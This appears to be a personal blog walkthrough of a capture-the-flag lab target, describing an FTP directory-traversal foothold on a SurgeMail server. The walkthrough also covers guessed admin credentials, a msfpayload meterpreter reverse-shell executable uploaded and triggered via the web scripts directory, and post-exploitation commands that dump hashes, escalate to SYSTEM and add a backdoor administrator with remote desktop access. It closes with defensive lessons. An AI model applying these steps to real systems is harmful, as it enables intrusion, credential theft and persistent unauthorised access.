Thursday, May 13, 2010

Offensive Security Part 2 -- KilltheN00b Walk Through HSIYF

How Strong is Your FU hacker challenge Part 2

Target 2: KilltheN00b

After some chips, salsa and a supersized burrito from el habinaro i was down for another challenge. I logged into the offsec labs and reviewed some of the documentation on the contest page that stated there were 2 targets.


After a quick portscan I chose to attack killthen00b purely based the available on the system offered. Ghost provided a HTTP port only. KilltheN00b had many open ports including FTP, HTTP and some various mail ports.

Scan output:
21/tcp open ftp
_ftp-anon: Anonymous FTP login allowed
25/tcp open smtp Surgemail smtpd 3.8k4-4
80/tcp open http Surgemail webmail (DNews based)
_html-title: SurgeMail Welcome Page
106/tcp open pop3pw Qualcomm poppassd (Maximum users connected)
110/tcp open pop3 SurgeMail pop3d 3.8k4-4
143/tcp open imap SurgeMail imapd 3.8k4-4
366/tcp open smtp Surgemail smtpd 3.8k4-4
465/tcp open tcpwrapped
587/tcp open smtp Surgemail smtpd 3.8k4-4
993/tcp open tcpwrapped
995/tcp open tcpwrapped
3389/tcp open ms-term-serv?
7025/tcp open tcpwrapped
7443/tcp open tcpwrapped

More ports = = more fun ??
More Targets = = more fun??
All Girls Just want to have fun?? Wait no that's a song LOL

Probably a wrong assumption, but its a good theory to cling to when times get rough

Initial FTP probing:

First thing i did was log into the FTP server with credentials that were provided on the offsec page. After logging into the FTP server there wasn't much to play with in any available directories so i decided to try to hop out of the FTP environment.

I tried to hop out of the ftp directory structure via directory traversal attacks with "cd ../../../../../"... Failed, so I then flipped the slashes to "cd ..\..\..\..\..\" and the response back indicated a fail based on the response. So i decided to directly call the root directory with "cd c:".


Cd C: correctly hopped me into a directory with loads of files available. I was also able to browse to a directory with system32 files. My actual first thought was to replace the system32 directory program Magnify.exe with my evil payload so that at the Remote desktop login the accessibility options would become a shell. But unfortunately I didn't have access to write to that directory so i moved on. After browsing files for awhile I decided this ftp session was a bust and logged out.


Next I decided to hit up the web page located on KilltheN00b. The web server indicated an application by the name of "surgemail".

I then noted the scripts directory on this site seemed to execute pages with a EXE extension. Very interesting... and a possible attack vector

Next I checked the exploit databases and verified an exploit for the version of surgemail running but the exploit was only valid for windows 2000 and 2003.


So I decided to check the remote desktop port in order to see what operating system was in use only to find out killthen00b was running a Win7 operating system and the exploit would need modification before it would work. This was a....


I loaded up the debugger and started modifying the exploit and realized that I was unable to control EIP with the exploits located on exploitDB... Either due to my lack of advanced level exploitation or the differences in operating systems or possibly a newer operating systems protection mechanisms i only had control of certain parts of the stack, but no EIP overwrite. To be correct, rather partial overwrite of EIP. This exploit utilized a null byte value the OS already providing on the first byte of the 4 byte EIP, we can use the provided nullbyte to bypass failure on shellcode insertion. I thought this was neat (I like that) otherwise our null stop execution of the program prematurely.

Before going further with expliotation I realized this exploit was a post authentication exploit and would need a user account. grrrr

More Web:

I browsed around the the surgemail pages for awhile trying attacks against authentication and authorization without much success till i hit a /domainadmin management page. On this page i was able to guess a password of test/test using burp "comparer" to compare my responses and noticed one of the outputs said "Account Details". I then verified that I could log into the server by logging into another port used for changing passwords "poppassd" located on port 106. The found login worked!!

Woot i could now use that exploit if i can get the exploit to work.. however this was still a fail after messing with more exploitation for a few hours.

Back to FTP:

Since I earlier noticed the EXE files had possible execution on the surge webpage i decided to hit the FTP session back up and see if I can get to the scripts directory. After messing around for awhile I realized that the "cd ..\..\" actually was working correctly and after a few iterations this technique got me to the root directory. I then browsed to the surgemail/scripts directory

ftp> cd ..\..\..\
250 Directory changed to "/MyDocuments/............./......../......".
ftp> ls
200 PORT command successful.
150 Opening ASCII mode data connection for listing
dr-xrwx--- 1 admin users 0 May 03 22:58 $Recycle.Bin
dr-xrwx--- 1 admin users 0 Jul 13 2009 Documents and Settings
dr-xrwx--- 1 admin users 0 Jul 13 2009 PerfLogs
dr-xrwx--- 1 admin users 0 May 03 19:20 Program Files
dr-xrwx--- 1 admin users 0 May 03 19:21 ProgramData
dr-xrwx--- 1 admin users 0 May 03 22:51 Python26
dr-xrwx--- 1 admin users 0 Apr 30 01:21 Recovery
dr-xrwx--- 1 admin users 0 May 07 23:48 surgemail
dr-xrwx--- 1 admin users 0 May 03 22:38 System Volume Information
dr-xrwx--- 1 admin users 0 May 07 23:48 Users
dr-xrwx--- 1 admin users 0 May 03 21:28 Windows
-r--rr---- 1 admin users 24 Jun 10 2009 autoexec.bat
-r--rr---- 1 admin users 10 Jun 10 2009 config.sys
-r--rr---- 1 admin users 2147016704 May 07 23:44 pagefile.sys
-r--rr---- 1 admin users 12645888 May 03 05:53 surgemail_installer.exe
ftp> cd surgemail
250 Directory changed to "/MyDocuments/............./......../....../surgemail".
ftp> cd scripts
250 Directory changed to "/MyDocuments/............./......../....../surgemail/scripts".

I then tried uploading a test file and it worked.... at this point i got pretty excited and went into exploitation mode.

Meterpreter Evil.exe:

I now needed an evil EXE file to have the webserver serve up for me on behalf of the killtheN00b host. So i popped open metasploit..

Create a reverse_tcp meterpreter shell.
root@ficti0n:~# cd /pentest/exploits/framework3
root@ficti0n:/pentest/exploits/framework3# ./msfpayload windows/meterpreter/reverse_tcp LHOST= LPORT=4444 X > evil.exe
Created by msfpayload (
Payload: windows/meterpreter/reverse_tcp
Length: 290
Options: LHOST=,LPORT=4444

Now I had a test payload to try, which I then uploaded to the ftp server in the surgemail/scripts directory this directory also contained other exe files such as webmail.exe which apeared to be executed by the surgemail webpage.. Will the page execute my exe file?

Back to the web part 2: the evil upload

Back on the web it was time to browse to the scripts directory and cross my fingers and toes, along with yelling at my friends to cross their fingers and toes too!!! Very important that all the bases are covered in information security..

Offensive Security in depth!!! or something like that.. (Wishful thinking)

So i started a multihandler for metasploit, just in case the reverseshell worked.

msf > use multi/handler
msf exploit(handler) > set LHOST
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > exploit
[*] Started reverse handler on
[*] Starting the payload handler...

I then proceeded to browse to the directory with all body parts crossed.....Hoping for a connect back to my listener.


My connection status in metasploit then indicated i had an open session. :)

Post Explotation:

With a shiny shell in hand I first dropped the hashes via meterpreter hashdump but i noticed from the sequence of characters the LM hashes were blank. So I decided to just create my own user, via the following scenario.

Get higher privilages:

meterpreter > getsystem system (via technique 1).

Add a new domain admin:

meterpreter > use incognito
Loading extension incognito...success.
meterpreter > add_user ficti0n
[*] Attempting to add user ficti0n to host
[+] Successfully added user
meterpreter > add_localgroup_user Administrators ficti0n
[*] Attempting to add user ficti0n to localgroup Administrators on host
[+] Successfully added user to local group

But i like GUI's so lets get remote desktop, and I noted in an earlier attempt to log into rdesktop with my ftp credentials that i needed to be part of the remote desktop users group.. so lets be part of the cool kids group shall we??

Get a Remote Desktop Gui:

meterpreter > add_localgroup_user "Remote Desktop Users" ficti0n
[*] Attempting to add user ficti0n to localgroup Remote Desktop Users on host
[+] Successfully added user to local group

I can now login with domain admin on a pretty gui interface provided by microsoft.. Thanks microsoft :) and thanks metaploit.

After logging into the windows7 machine I quickly found my proofs.txt and added it to the online scoreboard to raise me up to 50pts total. Job well done...Thanks to steponequit and carnalownage and sygog for calaborating on attack possibilities, sometimes multiple minds work better even if its not the solution possibilities for the future arise

Lessons Learned:

-Don't listen to other peoples chatter and take it as truth.While I was in IRC everyone was talking about compiling code and getting payloads correct..
-I knew better, I knew there was an easier way and only wasted a limited amount of time on exploit writing. I am sure there is a way to transfer that exploit but messing around all day isn't going to get me past the challenge.
-Again go with your initial observations of the application. My observation that the webpage was executing EXE files ultimately got me into the application even though i veered off the path for awhile listening to people in the IRC chat about payloads.
-Also again always trying things twice and CONFIRM.... Initially i thought i didn't have the traversal. it turns out i did 3 hours before I used it!


-Check the ACL's and the Jails on your server logins and make sure they are not traverseable.
-Review your applications for any known exploitable 3rd party software and update
-Do antivirus checking on file uploads to stop payloads from being uploaded and executed
-Do egress filtering to stop unnecessary ports from calling back to listeners on attackers machines

Closing notes:
I then went to the gym to wake up my forgotten muscles from sitting around all day and night... This was over 24 hours into this Challenge, I cheated and took a little (LONG) nap somewhere in there too.. I know I know.. sleeping on the job, but hey there was a pillow close by and I ran out of the redbull..

Oliver Brown (Ficti0n)
Originally Posted on

Up next: Part 3

Dropping shells on the Ghost and watching him laugh as he ultimately owns me!!!!

No comments: